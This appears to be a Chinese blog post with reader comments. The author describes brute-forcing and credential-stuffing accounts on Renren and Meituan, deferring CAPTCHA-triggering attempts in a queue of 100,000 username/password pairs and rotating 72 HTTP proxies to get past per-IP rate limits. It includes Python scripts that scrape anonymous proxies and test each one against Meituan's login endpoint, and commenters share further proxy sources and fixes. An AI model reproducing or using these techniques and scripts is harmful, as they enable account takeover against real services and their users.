HTTP暴力破解、撞库,有一些惯用的技巧,比如:
1. 在扫号人人网时,我遇到单个账号错误两次,强制要求输入验证码,而对方并未实施IP策略。
我采用维护10万(用户名,密码) 队列的方式来绕过验证码。具体的做法是,当某个用户名、密码组合遇到需要验证码,就把该破解序列挂起,放到队列尾部等待下次测试,继续破解其他账号密码。
这样就可以保证2/3的时间都在进行正常破解和扫号。
2. 在破解美团网某系统账号时,我遇到了单个IP访问有一定限制,请求频率不可过快。于是我挂了72个 HTTP代理来解决这个问题。 看似每个IP的请求都正常,但其实从整个程序上看,效率还是挺可观的。
本篇我发出自己抓HTTP的脚本片段,其实只有几行。匿名代理是从这里抓取的:http://www.xici.net.co/nn/
首先获取代理列表 :
from bs4 import BeautifulSoup import urllib2 of = open('proxy.txt' , 'w') for page in range(1, 160): html_doc = urllib2.urlopen('http://www.xici.net.co/nn/' + str(page) ).read() soup = BeautifulSoup(html_doc) trs = soup.find('table', id='ip_list').find_all('tr') for tr in trs[1:]: tds = tr.find_all('td') ip = tds[1].text.strip() port = tds[2].text.strip() protocol = tds[5].text.strip() if protocol == 'HTTP' or protocol == 'HTTPS': of.write('%s=%s:%s\n' % (protocol, ip, port) ) print '%s=%s:%s' % (protocol, ip, port) of.close()
接着验证代理是否可用,因为我是用于破解美团网系统的账号,因此用了美团的页面标记:
#encoding=gbk import httplib import time import urllib import threading inFile = open('proxy.txt', 'r') outFile = open('available.txt', 'w') lock = threading.Lock() def test(): while True: lock.acquire() line = inFile.readline().strip() lock.release() if len(line) == 0: break protocol, proxy = line.split('=') headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Cookie': ''} try: conn = httplib.HTTPConnection(proxy, timeout=3.0) conn.request(method='POST', url='http://e.meituan.com/m/account/login', body='login=ttttttttttttttttttttttttttttttttttttt&password=bb&remember_username=1&auto_login=1', headers=headers ) res = conn.getresponse() ret_headers = str( res.getheaders() ) html_doc = res.read().decode('utf-8') print html_doc.encode('gbk') if ret_headers.find(u'/m/account/login/') > 0: lock.acquire() print 'add proxy', proxy outFile.write(proxy + '\n') lock.release() else: print '.', except Exception, e: print e all_thread = [] for i in range(50): t = threading.Thread(target=test) all_thread.append(t) t.start() for t in all_thread: t.join() inFile.close() outFile.close()
正需要这个:)
哈哈,才发现原来这是YM的号啊!
学习一下,python做小工具真的合适.另外..python 2.x和 3.x真是..
补充一个获取代理IP的网站
这套代码用在IP巴士的代理IP也可以爬
在python2.7下测试。反馈
Traceback (most recent call last):
File “E:/proxy/addproxy.py”, line 14, in
html_doc = urllib2.urlopen(‘http://www.xici.net.co/nn/’ + str(page) ).read()
File “D:\Anaconda2\lib\urllib2.py”, line 154, in urlopen
return opener.open(url, data, timeout)
File “D:\Anaconda2\lib\urllib2.py”, line 435, in open
response = meth(req, response)
File “D:\Anaconda2\lib\urllib2.py”, line 548, in http_response
‘http’, request, response, code, msg, hdrs)
File “D:\Anaconda2\lib\urllib2.py”, line 467, in error
result = self._call_chain(*args)
File “D:\Anaconda2\lib\urllib2.py”, line 407, in _call_chain
result = func(*args)
File “D:\Anaconda2\lib\urllib2.py”, line 654, in http_error_302
return self.parent.open(new, timeout=req.timeout)
File “D:\Anaconda2\lib\urllib2.py”, line 435, in open
response = meth(req, response)
File “D:\Anaconda2\lib\urllib2.py”, line 548, in http_response
‘http’, request, response, code, msg, hdrs)
File “D:\Anaconda2\lib\urllib2.py”, line 473, in error
return self._call_chain(*args)
File “D:\Anaconda2\lib\urllib2.py”, line 407, in _call_chain
result = func(*args)
File “D:\Anaconda2\lib\urllib2.py”, line 556, in http_error_default
raise HTTPError(req.get_full_url(), code, msg, hdrs, fp)
urllib2.HTTPError: HTTP Error 503: Service Temporarily Unavailable
无法通过
加上请求头